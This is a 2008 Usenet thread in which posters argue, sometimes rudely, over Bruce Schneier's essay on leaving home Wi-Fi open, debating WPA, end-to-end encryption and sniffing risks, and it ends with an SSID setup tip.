>>> substantiation for any of your opinions, and only questioned my logic
>>> and interpretations.
>>
>> That's correct, I questioned your logic and interpretations. I still
>> do.
>
>... then you were in no position to do this. How can you possibly
>question someone's intrepretation of something you've not read yourself?
Easy! Jeff quoted it! Did you even see his "I'm late for a free lunch
post", or are you just coming into the thread now? Go back and read it
and see for yourself. No need to make a fool of yourself like this.
>No, strike that, it was a rhetorical question. Politicians do it all the
>time, its called "making stuff up to suit a personal agenda".
>
>There's no point debating this further tho - you've been caught in a lie
>and are too bull-headed to admit you screwed up. Lesson learned.
Nice.
> msg wrote:
>
>> John Navas wrote:
>>
>>>
>>> I disagree -- it's all one network.
>>
>>
>> I cannot imagine (in an unclassified network) imposing draconian network
>> level security on internal users;
>
>
> Even if one could consider WPA 'draconian' you've obviously never worked
> in a corporate environment.
Aux contraire, mon ami. I wasn't referring to WPA as draconian, but to
implications that the same level of _network_ security is always indicated
to be applied to internal users as to the outside world is often unacceptable
to commercial customers. I also expected such a comment in reply and
tend to resist the urge to mention experience, as analysis should stand on
its own in a discussion, but I have done considerable U.S.G. and commercial
networking.
Michael
>What do you mean, 'instead of commenting on the validity of [your]
>interpretations'? Just 2 lines above you seemed to understand that I
>was questioning your (logic and) interpretations.
>
>>Do you really need an answer as to how I derived my conclusion?
>
>We're making progress. In your first response, you denied making a
>conclusion. But yes, I was curious as to how you arrived where you
>arrived, since your position didn't logically follow from what you
>quoted in your OP.
In the interest of global harmony and universal peace, I'll explain
how I derived my conclusion.
1. I read the article at:
<http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
from which I quoted and commented:
>Do you subscribe to this manner of FUD (fear uncertainty doubt):
> "This is not to say that the new wireless security protocol,
> WPA, isn't very good. It is. But there are going to be
> security flaws in it; there always are."
>Swell. Leave your access point wide open because your neighbors might
>need it and because your chances of experiencing a problem is minimal.
>Never mind with encryption because it *MIGHT* be cracked in the
>future. While you're at it, leave your car doors unlocked for the
>same reasons. Door locks are easily picked, so why bother to use
>them.
2. To generate the above, I disassembled the quotation in the order
presented as:
> "This is not to say that the new wireless security protocol,
> WPA, isn't very good. It is."
which the author affirms and re-affirms that WPA is a good security
protocol. I just noticed that his use of the word "new" is rather
odd, especially since WPA was introduced in late 2002 and has been
available since 2003. Also, not the double negative. From this, I
initially concluded that the author thinks highly of WPA encryption
and being a security expert, would advocate it's use.
3. However, that was countered in the next sentence:
> "But there are going to be
> security flaws in it; there always are."
which refers to his own previous praise of WPA. It implies that WPA
*MIGHT* have some fatal flaw in the future which hints that it might
not be suitable for general consumption. If someone suggested that
Brand X of some product *MIGHT* have some some fatal flaw, one would
not generally consider such a testimonial as a recommendation.
4. At this point, I declared this to be FUD (fear, uncertainty,
doubt) on the basis of the sentence in #3. No facts are presented.
Only hints of doom and disaster. From my perspective, that's FUD.
5. Note that the original article (which you haven't read) would have
been equally effective at making his points without this sentence.
There's no connection between potential security flaws in WPA and
running an open network. If you're going to run an open network, it's
a non-issue. Yet, the author found it necessary to take a pot shot at
WPA, which I find interesting. My guess(tm) is that he wasn't so sure
of his recommendation to run an open network was all that good, and
needed some more ammunition. So, he hints that the main method of
securing a wireless network, is somehow useless because it *MIGHT* be
flawed in the distant future.
4. At this point, I expected a discussion by the author of on
wireless security. Instead, he instantly changes topic to:
> "I spoke to several lawyers about this, and in their
> lawyerly way they outlined several other risks with
> leaving your network open."
Huh? What happened to wireless security? It's for this reason and
similar abrupt topic changes that I suspect that the original article
may have been heavily edited or grafted together from bits and pieces.
In any case, this change effectively ended any discussion on WPA by
the author.
5. There rest of the article is about various risks and methods of
running an open network. In the last paragraph, he announces:
> "In my opinion, securing my wireless network isn't worth it."
which I presume to be the authors conclusion based on prospective
flaws in WPA and that he and others have successfully "gotten away
with it" by running an open wireless network without incident. I
concluded that he is recommending that we also do the same, however he
doesn't have the guts to say that.
If you fail to appreciate my logic, that's fine. I don't expect
everyone to think in precisely the same way. What I would find
interesting is if you would conscend to read the original article, and
comment on the authors advice, purpose, logic, and anecdotes.
Every election, some of my friends usually complain that this or that
measure didn't pass or that their favorite politician wasn't elected.
After listening to the logic and rationalizations, I ask "Did you
vote"? Quite often, the answer is "no", at which point I follow with
"Then you don't have a right to an opinion". Read the article.
>Char Jackson wrote:
>> Thanks, but you're talking to the wrong person. Jeff wrote the OP and
>> he alone controlled its context.
>
>No he didn't. John wrote the original post, you replied noting Bruce
>Schier's contentious article, and Jeff was commenting on the article.
>
>And to reiterate - since you admit to not having read the article, to
>write a criticism of Jeff's comments on it seems.... arrogant.... for
>want of a better word.
How about "ignorant"? "Lazy"? "Judgmental"?
>>Do you really need an answer as to how I derived my conclusion?
>
>We're making progress. ...
I've added "pedantic" and "supercilious" to the list.
--
Best regards,
John Navas <http:/navasgroup.com>
"Nothing is as peevish and pedantic as men's judgments of one another." [Desiderius Erasmus]
>Char Jackson wrote:
>> That's correct, I questioned your logic and interpretations. I still
>> do.
>
>... then you were in no position to do this. How can you possibly
>question someone's intrepretation of something you've not read yourself?
>
>No, strike that, it was a rhetorical question. Politicians do it all the
>time, its called "making stuff up to suit a personal agenda".
>
>There's no point debating this further tho - you've been caught in a lie
>and are too bull-headed to admit you screwed up. Lesson learned.
Yep.
--
Best regards,
John Navas <http:/navasgroup.com>
"A little learning is a dangerous thing." [Alexander Pope]
"It is better to sit in silence and appear ignorant,
than to open your mouth and remove all doubt." [Mark Twain]
"Being ignorant is not so much a shame, as being unwilling to learn."
[Benjamin Franklin]
>Every election, some of my friends usually complain that this or that
>measure didn't pass or that their favorite politician wasn't elected.
>After listening to the logic and rationalizations, I ask "Did you
>vote"? Quite often, the answer is "no", at which point I follow with
>"Then you don't have a right to an opinion". Read the article.
Amen.
--
Best regards,
John Navas <http:/navasgroup.com>
"Usenet is like a herd of performing elephants with diarrhea - massive,
difficult to redirect, awe inspiring, entertaining, and a source of mind
boggling amounts of excrement when you least expect it." --Gene Spafford
>On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
><notv...@cox.net.invalid> wrote:
>
>>Interesting counter point to securing your wireless
>><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>
>Bruce Schneier is a well regarded author of criticism on security
>issues. He's made a career of writing articles, columns, and two
>books on the topic. Scan the list of titles and tell me if you see a
>pattern:
><http://www.schneier.com/essays.html>
>
>...
>
>Do you subscribe to this manner of FUD (fear uncertainty doubt):
> "This is not to say that the new wireless security protocol,
> WPA, isn't very good. It is. But there are going to be
> security flaws in it; there always are."
On further reflection, methinks this might have something to do with him
still being a bit miffed at the way his Twofish algorithm was soundly
trounced by Rijndael (Joan Daemen & Vincent Rijmen) in the Advanced
Encryption Standard (AES) competition. WPA is of course based on AES.
;)
>On Fri, 28 Nov 2008 12:11:32 -0800, Jeff Liebermann <je...@cruzio.com>
>wrote in <a7j0j4homh91cibds...@4ax.com>:
>
>>On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
>><notv...@cox.net.invalid> wrote:
>>
>>>Interesting counter point to securing your wireless
>>><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>>
>>Bruce Schneier is a well regarded author of criticism on security
>>issues. He's made a career of writing articles, columns, and two
>>books on the topic. Scan the list of titles and tell me if you see a
>>pattern:
>><http://www.schneier.com/essays.html>
>>
>>...
>>
>>Do you subscribe to this manner of FUD (fear uncertainty doubt):
>> "This is not to say that the new wireless security protocol,
>> WPA, isn't very good. It is. But there are going to be
>> security flaws in it; there always are."
>
>On further reflection, methinks this might have something to do with him
>still being a bit miffed at the way his Twofish algorithm was soundly
>trounced by Rijndael (Joan Daemen & Vincent Rijmen) in the Advanced
>Encryption Standard (AES) competition. WPA is of course based on AES.
>;)
Good point. I didn't make the connection until you mentioned it.
However, I don't think he has any hard feelings. There were 5
algorithms in the AES competition. That means there were 4 other
losers.
Bruce Shneier also has a web page on Twofish that doesn't seem even
slightly irate or miffed:
<http://www.schneier.com/twofish.html>
Lots of applications use Twofish, probably because of the lack of
license fees. Anyway, that was 8 years ago. One would think he has
gotten over it by now.
No matter the reason, justification, or sour grapes, his comment on
WPA might have security flaws is in bad taste, and his subsequent
suggestions to run an open wireless network is just plain lousy
advice.
I don't think he suggests anyone else run an unsecured network he merely
outlined some of the thoughts he had in doing risk analysis on running
an open access point at his house
John
>> <http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>I don't think he suggests anyone else run an unsecured network he merely
>outlined some of the thoughts he had in doing risk analysis on running
>an open access point at his house
>John
If that's true, why did you post the Bruce Schneier URL in the first
place?
John Navas started by posting a wireless security checklist that
features WPA as the prime method of achieving security.
You then followed up with:
> Interesting counter point to securing your wireless
> <http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
> John
By implication, using WPA means that one is not running an open access
point. If the Wired Magazine article not about running an open
unsecured wireless system, precisely what is your "interesting
counterpoint" all about?
Incidentally, I was going to write a satire in the style of the Wired
Magazine article on driving the wrong way on the freeway. It's a
great way to get anywhere fast. The risks are minimal because law
enforcement is usually ineffective and besides, a good lawyer will get
you off on technicalities and procedures. It also saves gasoline
taking the shortest path. Ad nausium. I had planned to do this
without ever advocating that anyone drive the wrong way on the
freeway. Just vague implications and anecdotes of success stories.
However, I'm getting tired of all this. If you want to leave your
house, car, business, or wireless wide open, by all means, please do
so. Just don't tell other users that are not as technical astute,
can't recognize an attack when they see one, and have no clue what's
happening, to do the same. It should be Secure by Default.
From my point of view it was interesting to read a contrarian view that
included some discussion of the risk analysis process.
Probably should have included a bit of my own text in with the reply to
stage it in the manner that I meant.
John
Whatever. You've ceased to surprise me with your weaselly denials that
you screwed up, and any lingering interest I might have had in getting
you to see sense has died.
> It looks to me like Jeff quoted a bit from
> that article, and then commented on it. I commented on his comments.
Which was impossible without reading the article.
>> But you did.
>
> I disagree. I don't even know what the article's advice was.
Exactly.
Fair enough, I misinterpreted your remarks as being related to the topic
under dicussion :-)
> but to
> implications that the same level of _network_ security is always indicated
> to be applied to internal users as to the outside world is often
> unacceptable to commercial customers.
I can't quite parse that sentence. I'll assume it means commercial
customers often won't accept having the same security applied internally
as externally; if it means something different then please clarify.
Assuming I'm interpreting it correctly - I agree, clueless customers
often insist on rubbish internal security. These would be the ones who
lose USB sticks in pubs, leave laptops on trains, allow the cleaners to
copy their customer contact database and allow leavers to email their
top clients' details to a rival.
> I also expected such a comment in reply and
> tend to resist the urge to mention experience, as analysis should stand on
> its own in a discussion, but I have done considerable U.S.G. and commercial
> networking.
Experience of govt computing does /not/ impress me. In the past I've
worked with Whitehall and a more computer-clueless bunch of chinless
arts-grad wonders would be hard to find even if you asked Monty Python
to re-enact the Upper Class Twit of the Year Show. :-)
> msg wrote:
...
>> implications that the same level of _network_ security is always
>> indicated to be applied to internal users as to the outside world is often
>> unacceptable to commercial customers.
>
>
> I can't quite parse that sentence. I'll assume it means commercial
> customers often won't accept having the same security applied internally
> as externally;
Yes
> ...allow the cleaners to copy their customer contact database
I like this one.
Michael
>On Sun, 30 Nov 2008 12:20:32 -0800, John Navas
><spamf...@navasgroup.com> wrote:
>>On further reflection, methinks this might have something to do with him
>>still being a bit miffed at the way his Twofish algorithm was soundly
>>trounced by Rijndael (Joan Daemen & Vincent Rijmen) in the Advanced
>>Encryption Standard (AES) competition. WPA is of course based on AES.
>>;)
>
>Good point. I didn't make the connection until you mentioned it.
>However, I don't think he has any hard feelings. There were 5
>algorithms in the AES competition. That means there were 4 other
>losers.
Most of the others didn't come close to Twofish and Rijndael, the
notable exception being Serpent. Regardless, I don't think this has any
real bearing on my speculation.
>Bruce Shneier also has a web page on Twofish that doesn't seem even
>slightly irate or miffed:
><http://www.schneier.com/twofish.html>
>Lots of applications use Twofish, probably because of the lack of
>license fees.
Rijndael is likewise free of license fees, and is much more widely used
even outside of AES. Even the earlier Blowfish is more widely used than
Twofish.
>Anyway, that was 8 years ago. One would think he has
>gotten over it by now.
I dunno about that -- I've heard stories, and scientists have been
famously known to hold grudges for much longer.
>No matter the reason, justification, or sour grapes, his comment on
>WPA might have security flaws is in bad taste, and his subsequent
>suggestions to run an open wireless network is just plain lousy
>advice.
Agreed.
> From my point of view it was interesting to read a contrarian view that
>included some discussion of the risk analysis process.
The risk analysis was seriously flawed.
Jeff Liebermann wrote:
> As I've mentioned several times, the computer can be almost totally
> protected, but without encrypting the wireless traffic, a simple
> sniffer can capture unencrypted traffic, passwords, email, etc.
I prefer, and heartily recommend, regardless of wireless encryption,
end-to-end encryption. If you don't trust your traffic in wireless
space (because you can't control whether it can be intercepted in that
space), why would you trust it travelling over wires you don't control?
> ... No amount of security is ever sufficient. Given sufficient time,
> resources, and technology, any level of security can eventually be
> compromised. ...
Yes. That's precisely the point.
> ... What I find offensive about Schneier's article is that he trashes
> the most basic and easist form of security, which in this case is WPA.
We differ here. I don't feel he trashed it, but rather put it in the
same context as what I quoted from you just above ("no amount of
security ..."), then pointed out that he operates his own wireless
network without WPA, and makes a case why he believes this is a good
thing.
> To get decent security, the one part of the puzzle that must work is
> WPA. Everything else can be no more than an additional obstacle,
> usually of minor importance.
Given a suitable definition of "security", perhaps, but then I would
likely disagree with the definition of "security".
To get decent security, we must first understand what it is we are
securing. Is it the data? Where is the data? What is the data's
lifespan? Is it access to the computer(s)? Is it access to the network?
Securing each of these things is done differently than each of the
others.
> ... I'm undecided as to whether it's better to protect the data or
> control access. ...
My sense on that is that it's case-by-case dependant, but more often
than not, protecting the data regardless of access control on the
network is warranted.
> I honestly don't care why or how he runs his open network. It's bad
> advice for the general public, most of whom fail to appreciate the
> risks and implications.
I agree that for most people it would not be advisable to leave network
access open.
>> ... even if WPA is considered a suitable way to secure access to your
>> network at the momen, don't count on it to secure the data on your
>> computer.
> Ummm... it secures the data transport, not the computer.
It controls access to, and encrypts *a portion* of the data transport,
unless your data is residing strictly within an ad-hoc wireless network.
At some point that data will travel on wires on its way to its ultimate
destination. If you're concerned about protecting data in transit, you
need to protect it end-to-end, not just over one (wired or wireless)
link.
> ... I'm sure he also uses a VPN and SSH to talk to his work computers.
> Great idea, but somehow missing in his article advocating running an
> unencrypted network.
Agreed. I'm guessing, but I suspect the author assumes the reader is a
regular reader and already knows about end-to-end encryption techniques.
If my guess is correct, that's an unfortunate assumption.
For what it's worth, all of this is one reason why I don't like "op-ed",
and I feel that such articles are frequently given much too much weight.
Bruce Schneier is respected among computer security professionals, but
this article was quite obviously (to me, anyway) just an opinion piece.
In my experience, Wired generally is.
> ... Most real security experts that I know, are constantly worried
> about this or that threat. Every time there's a new exploit
> announced, there's a flurry of nervous activity.
I consider myself pretty good with computer and network security,
perhaps even an "expert" (it is part of my job and has been for more
than a few years). I'm not nervous about systems I manage (whether my
own or managed for someone else).
> ... I had one such expert bail out in the middle of lunch when someone
> detailed a new exploit that he hadn't heard about. I pay security
> experts to be worried.
I prefer security experts that are informed and prepared ... I don't
want someone working with me who will do "anything" just for the sake of
doing "something".
> Again, wireless security (WPA) will not protect your computer. It
> will protect your network from sniffing.
Only on that particular link. I see (and refer to) WPA as a form of
access control. If you want to protect your data in transit, you need
to protect it beyond that initial wireless link.
(quoting Bruce Schneier's statement about WPA)
>> "But there are going to be security flaws in it; there always are."
> Note that the original article ... would have been equally effective
> at making his points without this sentence.
Agreed.
John Navas wrote:
> It's a bit like saying, condoms sometimes fail, so don't bother to use
> them. ...
Not exactly. It's more like saying "condoms sometimes fail, and they're
inconvenient" so I prefer to use a different (better) form of protection.
> WPA does protect your computer from attack over the wireless network.
... and it does so by controlling access to your network.
> That would not be a valid point -- WPA does provide real and valuable
> security. ....
WPA provides access control and encryption over one network link. It
works well for that. Most people need their data protected between two
endpoints that span multiple network links. WPA falls short on that.
> There's ample evidence that open wireless will be abused, with
> potentially negative consequences. All it takes is for the kid next
> door to use your wireless to file share illicit materials (imagine
> that); the RIAA and MPAA trace it back to your account; your computers
> get seized and you get sued.
Schneier points out in his article, however, that he feels he has the
perfect alibi for such a case, precisely by keeping his wireless network
access point unsecured. I wouldn't test that myself, by the way, nor
would I recommend it, but it's relevant to the discussion in the context
of the above quote.
Mark McIntyre wrote:
> Then his article is highly disingenuous, or he really is a fool. Does
> he run an encrypted VPN between every computer on his network? Is all
> traffic to the internet encrypted, including email?
I'm not defending the article or its author. I was simply pointing out
that one or more previous posters on this thread appear to have
misinterpreted the point of the article. Your question would be best
directed at the author.
--
----------------------------------------------------------------------
Sylvain Robitaille s...@alcor.concordia.ca
Systems analyst / AITS Concordia University
Faculty of Engineering and Computer Science Montreal, Quebec, Canada
----------------------------------------------------------------------
Not enough information to tell, as he doesn't detail the extent of other
controls on his home network.
John
> I don't think he suggests anyone else run an unsecured network he merely
> outlined some of the thoughts he had in doing risk analysis on running
> an open access point at his house
Hmm. I appreciate there are other translations of
"In my opinion, securing my wireless network isn't worth it."
but the most obvious one is that he doesn't think there's any point
securing a wireless network. Feel free to translate it differently....
Which is, indeed, one of the flaws.
Its like stating you don't see the point locking your house doors,
without mentioning the rabid wolf in your hallway.
You rang?
<http://802.11junk.com/jeffl/pics/jeffl/slides/jeffl-wolf.html>
I don't think WPA will protect anyone against "the rabid wolf in the
hallway". However, I have been known to ignore trespassers if they
bring caviar, sushi, or ice cream.
--
# Jeff Liebermann 150 Felker St #D Santa Cruz CA 95060
# 831-336-2558 je...@comix.santa-cruz.ca.us
# http://802.11junk.com je...@cruzio.com
# http://www.LearnByDestroying.com AE6KS
I translated it as, he doesn't feel it's worthwhile to secure *HIS*
wireless network, not *A* wireless network. Pretty big difference,
IMO. My wireless network, for example, is worth securing, and you
probably feel yours is, too. Apparently, his isn't.
>Jeff Liebermann wrote:
>
>> As I've mentioned several times, the computer can be almost totally
>> protected, but without encrypting the wireless traffic, a simple
>> sniffer can capture unencrypted traffic, passwords, email, etc.
>
>I prefer, and heartily recommend, regardless of wireless encryption,
>end-to-end encryption. If you don't trust your traffic in wireless
>space (because you can't control whether it can be intercepted in that
>space), why would you trust it travelling over wires you don't control?
While your point in valid in principle, in practice it's far more
difficult to snoop wired Internet traffic than open wireless traffic.
>> ... No amount of security is ever sufficient. Given sufficient time,
>> resources, and technology, any level of security can eventually be
>> compromised. ...
>
>Yes. That's precisely the point.
What point? That the NSA can do it, so why bother with security?
>I consider myself pretty good with computer and network security,
>perhaps even an "expert" (it is part of my job and has been for more
>than a few years). I'm not nervous about systems I manage (whether my
>own or managed for someone else).
You should be. No matter how good you are, those systems are still
vulnerable.
>> Again, wireless security (WPA) will not protect your computer. It
>> will protect your network from sniffing.
>
>Only on that particular link.
True, but that can be quite valuable as a part of the overall solution.
>I see (and refer to) WPA as a form of
>access control. If you want to protect your data in transit, you need
>to protect it beyond that initial wireless link.
Not necessarily -- it's a matter of relative risks, and the risk of open
wireless is orders of magnitude greater than the risk on the Internet
backbone.
>> It's a bit like saying, condoms sometimes fail, so don't bother to use
>> them. ...
>
>Not exactly. It's more like saying "condoms sometimes fail, and they're
>inconvenient" so I prefer to use a different (better) form of protection.
Abstinence? That's actually a pretty good analogy. If you're not going
to bother with WPA, then abstain from wireless.
>> WPA does protect your computer from attack over the wireless network.
>
>... and it does so by controlling access to your network.
Actually it encrypts the traffic.
>> That would not be a valid point -- WPA does provide real and valuable
>> security. ....
>
>WPA provides access control and encryption over one network link. It
>works well for that. Most people need their data protected between two
>endpoints that span multiple network links. WPA falls short on that.
I disagree on both counts. Feel free to provide real evidence to back
up those contentions.
>> There's ample evidence that open wireless will be abused, with
>> potentially negative consequences. All it takes is for the kid next
>> door to use your wireless to file share illicit materials (imagine
>> that); the RIAA and MPAA trace it back to your account; your computers
>> get seized and you get sued.
>
>Schneier points out in his article, however, that he feels he has the
>perfect alibi for such a case, precisely by keeping his wireless network
>access point unsecured. I wouldn't test that myself, by the way, nor
>would I recommend it, but it's relevant to the discussion in the context
>of the above quote.
There's ample evidence that he's wrong -- whether he prevails or not in
the end, he can still go through hell in the meantime.
>Mark McIntyre wrote:
>
>> Then his article is highly disingenuous, or he really is a fool. Does
>> he run an encrypted VPN between every computer on his network? Is all
>> traffic to the internet encrypted, including email?
>
>I'm not defending the article or its author. I was simply pointing out
>that one or more previous posters on this thread appear to have
>misinterpreted the point of the article. ....
In your opinion. Not in mine.
On the contrary -- his argument is based solely on computer-level
protection.
> While your point in valid in principle, in practice it's far more
> difficult to snoop wired Internet traffic than open wireless traffic.
That really depends on which side of the network you're sitting on.
Where I sit, they're both equally trivial. Where the average
script-kiddie sits, perhaps you're right, but the really serious threats
are usually "on the inside", where, once again, they're equally trivial.
>> I'm not nervous about systems I manage ...
>
> You should be. No matter how good you are, those systems are still
> vulnerable.
Of course they're "vulnerable", in one form or another. I've taken
measures, however to reduce _known_ vulnerabilities to a minimum, to
limit the potential avenues of intrusion, and to increase the likelihood
that a compromise will be detected. That last one matters, and is what
permits me to not worry. Can undetected intrusion occur? Of course, at
least in theory. Is it likely? No.
>>> Again, wireless security ... will protect your network from
>>> sniffing.
>>
>> Only on that particular link.
>
> True, but that can be quite valuable as a part of the overall
> solution.
Only if your traffic isn't encrypted end-to-end by other means, which
means someone trying to sniff needs only to park himself somewhere
between the wired side of your wireless access point, and the sensitive
data's destination.
> ... it's a matter of relative risks, and the risk of open wireless is
> orders of magnitude greater than the risk on the Internet backbone.
Consider the layers above the backbone. Your traffic does not pass from
personal wireless link, to backbone, to destination host. There are
other layers involved. The security of the data in transit is only as
good as the weakest form of security applied to it within the entire
end-to-end trajectory.
>>> WPA does protect your computer from attack over the wireless
>>> network.
>>
>>... and it does so by controlling access to your network.
>
> Actually it encrypts the traffic.
Encrypting the traffic (over a single short network link) has nothing to
do with the previous statement of protecting the computer from attack
over the wireless network.
>> WPA provides access control and encryption over one network link. It
>> works well for that. Most people need their data protected between
>> two endpoints that span multiple network links. WPA falls short on
>> that.
>
> I disagree on both counts. Feel free to provide real evidence to back
> up those contentions.
Try getting onto a WPA-secured network for which you don't know the
"key", and see "evidence" that it works well at providing access control.
Start examining some packet traces, of traffic over both the WPA-secured
wireless network, where you'll see that WPA works well at encrypting
traffic over that link, then the same traffic over the wired portion of
the network after it leaves the AP, and see WPA fall short. Need more
evidence than that?
>John Navas wrote:
>
>> While your point in valid in principle, in practice it's far more
>> difficult to snoop wired Internet traffic than open wireless traffic.
>
>That really depends on which side of the network you're sitting on.
>Where I sit, they're both equally trivial. Where the average
>script-kiddie sits, perhaps you're right, but the really serious threats
>are usually "on the inside", where, once again, they're equally trivial.
I respectfully disagree. Snooping of wireless traffic is orders of
magnitude more likely than snooping of wired traffic, and the really
serious threats aren't hard things like snooping of wired Internet
traffic -- they are relatively easy things like website compromise,
cross-site scripting attacks, and the like.
<http://www.theregister.co.uk/2008/04/16/mystery_web_compromise_unpicked/>
<http://www.channelregister.co.uk/2008/06/05/scansafe_web_malware_survey/>
<http://www.channelregister.co.uk/2008/07/30/websense_high_profile_website_malware_survey/>
>Of course they're "vulnerable", in one form or another. I've taken
>measures, however to reduce _known_ vulnerabilities to a minimum, to
>limit the potential avenues of intrusion, and to increase the likelihood
>that a compromise will be detected. That last one matters, and is what
>permits me to not worry. Can undetected intrusion occur? Of course, at
>least in theory. Is it likely? No.
It's actually likely. The vast majority of intrusions go undetected,
even by folks with serious expertise. Your assumption is unwarranted,
and probably giving you a false sense of security.
>Only if your traffic isn't encrypted end-to-end by other means, which
>means someone trying to sniff needs only to park himself somewhere
>between the wired side of your wireless access point, and the sensitive
>data's destination.
It's hard if not impossible to encrypt *all* traffic end-to-end.
When browsing websites that don't support HTTPS for all traffic, as most
don't, then traffic is unencrypted over the public Internet even when
using VPN -- since the remote VPN endpoint isn't at the remote website,
part of the Internet path is unencrypted. Thus I use VPN when at an
open public hotspot (very high risk), but not when I'm using a wired
connection (very low risk).
To be clear, I do protect the transmission of sensitive information
(passwords, bank account numbers, credit card numbers, social security
number, etc), but I don't know of any practical way for me to encrypt
*everything*. If you really do know how to do it, then please educate
me... ;)
But then even with end-to-end encryption you are still vulnerable to
compromise of and at the other end, which is a far more likely risk.
I worry much more about the security of businesses on the Internet than
I do my own security and wired Internet security, and with good reason.
One of a great many cases in point:
"This week also saw the personal information of almost 1,000 bank
customers lost by an employee of Bank of Ireland, after the data was
copied onto an unencrypted USB memory stick."
>Consider the layers above the backbone. Your traffic does not pass from
>personal wireless link, to backbone, to destination host. There are
>other layers involved. The security of the data in transit is only as
>good as the weakest form of security applied to it within the entire
>end-to-end trajectory.
Sure, but I think you're worrying about the wrong problem. I don't take
precautions against struck by meteorites while walking around outside,
but I do take precautions against getting hit by cars. I might be
killed by a meteorite, but I won't get hit by a car while worrying about
meteorites. ;)
>> Actually it encrypts the traffic.
>
>Encrypting the traffic (over a single short network link) has nothing to
>do with the previous statement of protecting the computer from attack
>over the wireless network.
Of course it does, since malware traffic can't be successfully injected
into the encrypted transmissions.
>> I disagree on both counts. Feel free to provide real evidence to back
>> up those contentions.
>
>Try getting onto a WPA-secured network for which you don't know the
>"key", and see "evidence" that it works well at providing access control.
>Start examining some packet traces, of traffic over both the WPA-secured
>wireless network, where you'll see that WPA works well at encrypting
>traffic over that link, then the same traffic over the wired portion of
>the network after it leaves the AP, and see WPA fall short. Need more
>evidence than that?
Yes, I need real evidence that snooping of traffic over the wired
Internet is a *significant* (not just theoretical) risk, especially as
compared to other risks.
> I respectfully disagree. Snooping of wireless traffic is orders of
> magnitude more likely than snooping of wired traffic, and the really
> serious threats aren't hard things like snooping of wired Internet
> traffic -- they are relatively easy things like website compromise,
> cross-site scripting attacks, and the like.
Ummmm.... and WPA on the local wireless link protects against these?
How? I think you're drifting off the point.
>> Can undetected intrusion occur? Of course, at least in theory. Is
>> it likely? No.
>
> It's actually likely. The vast majority of intrusions go undetected,
> even by folks with serious expertise. Your assumption is unwarranted,
> and probably giving you a false sense of security.
Who's making the unwarranted assumption here? You know nothing about
my systems or about what I know or can detect about them. The thing
about undetected intrusion, of course, is that by definition, you never
know if one has happened. However, if you know your systems well, and
you know how to protect them, you can be pretty sure of raising the bar
of the skill level that would be required for an undetected intrusion.
You raise that bar high enough, and the question becomes whether or not
it's worth the effort for the would-be intruder.
Would I claim that I can single-handedly properly secure financial data
or medical data on a database server? (well, I did do one of those in
the past) No; I'm not trying to be arrogant. However, I have plenty
of experience protecting what I would consider non-critical personal
information (mine and others') on computer systems. Could I have done
even better? Probably, yes. Have I ever had a system compromised?
Once, many years ago, via a then-recently discovered vulnerability in
FTP server software on a system I was managing. Undetected? Only
briefly ...
> It's hard if not impossible to encrypt *all* traffic end-to-end.
Not *all* traffic contains sensitive data. Do I really care if you can
sniff my Google searches and their results? Protect what's worth
protecting.
Does WPA on a single network link do all that much to protect your
username and password if you use POP or IMAP to read mail? I suppose
it does if your only concern is protecting your credentials from the
neighborhood teens. I prefer to avoid unencrypted protocols like POP
or IMAP. If you use "secure POP" (POP/TLS) or "secure IMAP", it
wouldn't matter if WPA wasn't available.
> But then even with end-to-end encryption you are still vulnerable to
> compromise of and at the other end, which is a far more likely risk.
It isn't "end-to-end" if it isn't "application-to-application". WPA, as
you know, won't protect your data at the other end. If the risk is far
more likely, what protection does WPA offer?
> I worry much more about the security of businesses on the Internet
> than I do my own security and wired Internet security, and with good
> reason.
That's a big part of the problem, yes: people ("businesses") making
false assumptions about computer and network security, and those false
assumptions lead to compromised data, usually because not enough emphasis
was placed on protecting that data in the right places. "hard crusty
exterior with a soft chewy center ..." Businesses "believe" their data
is "secure" because they've deployed a "firewall". How is that
different than individuals believe their personal computers are "secure"
because they've enabled WPA on their wireless access points?
> One of a great many cases in point:
>
> "This week also saw the personal information of almost 1,000 bank
> customers lost by an employee of Bank of Ireland, after the data
> was copied onto an unencrypted USB memory stick."
I bet they had HTTPS for authenticated access to their web servers, and
WPA-protected wireless local networks, though. They took the steps
recommended to them by computer security "experts", yet still failed to
protect their sensitive data. Thank you for helping make my point. :-)
> Sure, but I think you're worrying about the wrong problem.
No, I'm worrying about understanding what it is I'm protecting, where,
from what or whom, and why. I use WPA on my wireless network at home
(and incorporated EAP-TTLS with dynamically negotiated encrytion for a
large wireless network I did in my previous employment), because it keeps
outsiders from being able to use my network, not because it encrypts any
personal information that might pass over that link. The protection of
the sensitive data passing over the wireless link is taken care of by
other means, and that data would be protected regardless of the encryption
on the wireless link. That's been my point all along, and it is that
which I feel others missed from Schneier's article (recall that's what
caused me to join the discussion), largely because the article makes no
explicit mention of it. It is, however, quite visible in its absence.
>>> I disagree on both counts. Feel free to provide real evidence to
>>> back up those contentions.
>>
> ... I need real evidence that snooping of traffic over the wired
> Internet is a *significant* (not just theoretical) risk, especially as
> compared to other risks.
Wait a minute ... The points that you disagree with above, and for
which I explained a simple means by which you can observe them in action
("evidence") are the following:
>>>> WPA provides access control and encryption over one network link.
>>>> It works well for that. Most people need their data protected
>>>> between two endpoints that span multiple network links. WPA falls
>>>> short on that.
Now you want evidence that *wired* connections are vulnerable to
snooping. See HTTPS (and other TLS-tunneled protocols) for such
evidence. It long predates WPA, and even WEP. Are you suggesting that
it's really a no-op and is protecting against an insignificant threat?
See also the above quote you provided about Bank of Ireland's customer
data. Would WPA have helped there, or would better protection of the
data in transit have been warranted?
>* Make your wireless SSID unique. This helps avoid network collisions. A
>good way to do this is to use your address, phone number, and/or name
>for your SSID (making it easy for you to be contacted if something is
>wrong with your wireless network).
* True story of network collision problem:
A client complained to me that the home office wireless Internet had
always been very flaky, that even having the (shudder) Geek Squad come
out hadn't really helped, and asked me if anything affordable could be
done about the problem. Sure enough I had trouble getting and keeping a
connection with a laptop. Even moving closer to the wireless access
point didn't help. That was sufficiently odd that I decided to start
over from scratch, loading the latest router firmware, resetting to
factory defaults, and then running through my standard initial setup
routine for wireless networking. And voilÄ…! Strong, solid connection,
excellent performance.
